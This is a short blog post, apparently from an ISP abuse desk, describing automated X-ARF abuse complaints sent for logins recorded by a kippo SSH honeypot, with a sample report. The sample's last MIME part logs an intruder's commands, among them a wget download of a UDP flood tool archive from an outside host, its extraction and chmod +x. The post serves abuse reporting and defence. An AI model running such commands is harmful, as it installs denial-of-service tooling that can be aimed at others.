sshd complaints – update

The automatic complaint-mechanism is now active. A X-ARF complaint is generated
for each session where a successful login into the kippo-honeypot produced some
recorded commands. The email address where the complaint is sent to is generated
like always – check own database, check ripe-website and check abusix.
Here is an example of the second mime-part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"


Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

and the third MIME-part looks like this:


MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
–===============0648269240==–

Tags:

Leave a Reply

You must be logged in to post a comment.